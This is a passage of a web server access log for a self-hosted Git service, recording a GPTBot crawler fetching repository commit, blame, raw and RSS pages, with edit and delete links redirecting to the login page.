"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11746] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" +[17/Feb/2026:16:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14604] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:59:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11796] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11114] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" +[17/Feb/2026:16:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26365] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12408] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 37458] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:16:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:16:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 49059] [Gzip 21.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:16:59:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:16:59:57 +0000] - 